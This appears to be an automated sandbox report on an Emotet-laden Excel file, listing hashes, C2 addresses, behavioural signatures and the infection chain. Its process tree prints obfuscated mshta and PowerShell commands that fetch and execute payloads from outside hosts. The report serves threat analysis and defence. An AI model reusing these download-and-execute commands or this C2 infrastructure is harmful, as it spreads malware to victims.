Analysis

  • max time kernel
    122s
  • max time network
    160s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20-01-2022 10:38

General

  • Target

    a94875a62546e0ff04e0a0ff648b48bc6ad7071b539a8d41c8d1176ce4e1252b.xls

  • Size

    142KB

  • MD5

    5bffdae22f776d781cab2ad5309a6154

  • SHA1

    7943586d63be16066060c5482073b1313cbc78b0

  • SHA256

    a94875a62546e0ff04e0a0ff648b48bc6ad7071b539a8d41c8d1176ce4e1252b

  • SHA512

    7d1d540e1bb3c4850ae18c0d1fd80082c17b18e4d6c5992c8265ea2c6ba93bce1338669f82ad13115feb56c962bdd3e389173b97c484b325187d482438a4d7e8

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fer.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a94875a62546e0ff04e0a0ff648b48bc6ad7071b539a8d41c8d1176ce4e1252b.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:900
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:652
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fer.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3560
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3064
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:3084
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:3128
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Llpletwmxhlqus\mzrf.ewh",sbPgDJlRZZtXL
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1776
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Llpletwmxhlqus\mzrf.ewh",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3792
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 652 -s 1664
            4⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2076

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    3
    T1082

    Query Registry

    2
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • \Users\Public\Documents\ssd.dll
      MD5

      321380dc019516dfff7c977712f3c4cc

      SHA1

      88a64b3ff6a5cc01696672a3c880a4753acaf330

      SHA256

      2200463c1d38d5aab53073663fb65625a6c6df671ac9c26ff35e6567cbc588a9

      SHA512

      15fc392df12e787e503b14f957b00ef703de66e2a5e7029d6a2a5a3d443ee33ba19429f8f140c3f9d9c4175ab7d3c01079417b21051cdc033eda9b81ff5dd763

    • memory/1776-621-0x0000000000920000-0x0000000000946000-memory.dmp
      Filesize

      152KB

    • memory/2660-122-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-662-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-132-0x00007FFEF1380000-0x00007FFEF1390000-memory.dmp
      Filesize

      64KB

    • memory/2660-665-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-118-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-664-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-663-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-131-0x00007FFEF1380000-0x00007FFEF1390000-memory.dmp
      Filesize

      64KB

    • memory/2660-119-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-121-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/2660-120-0x00007FFEF4630000-0x00007FFEF4640000-memory.dmp
      Filesize

      64KB

    • memory/3084-609-0x0000000002E30000-0x0000000002E56000-memory.dmp
      Filesize

      152KB

    • memory/3128-613-0x0000000004AE0000-0x0000000004B06000-memory.dmp
      Filesize

      152KB

    • memory/3128-611-0x0000000003050000-0x0000000003076000-memory.dmp
      Filesize

      152KB

    • memory/3560-563-0x0000027E599D0000-0x0000027E599D2000-memory.dmp
      Filesize

      8KB

    • memory/3560-586-0x0000027E71F00000-0x0000027E71F76000-memory.dmp
      Filesize

      472KB

    • memory/3560-554-0x0000027E59910000-0x0000027E59932000-memory.dmp
      Filesize

      136KB

    • memory/3560-564-0x0000027E599D3000-0x0000027E599D5000-memory.dmp
      Filesize

      8KB

    • memory/3560-591-0x0000027E599D6000-0x0000027E599D8000-memory.dmp
      Filesize

      8KB

    • memory/3560-575-0x0000027E59990000-0x0000027E599CC000-memory.dmp
      Filesize

      240KB

    • memory/3792-632-0x0000000004830000-0x0000000004856000-memory.dmp
      Filesize

      152KB

    • memory/3792-638-0x0000000004AD0000-0x0000000004AF6000-memory.dmp
      Filesize

      152KB

    • memory/3792-640-0x0000000004BB0000-0x0000000004BD6000-memory.dmp
      Filesize

      152KB

    • memory/3792-642-0x0000000004C30000-0x0000000004C56000-memory.dmp
      Filesize

      152KB

    • memory/3792-636-0x00000000049F0000-0x0000000004A16000-memory.dmp
      Filesize

      152KB

    • memory/3792-634-0x0000000004910000-0x0000000004936000-memory.dmp
      Filesize

      152KB

    • memory/3792-630-0x0000000004750000-0x0000000004776000-memory.dmp
      Filesize

      152KB

    • memory/3792-625-0x0000000000720000-0x0000000000746000-memory.dmp
      Filesize

      152KB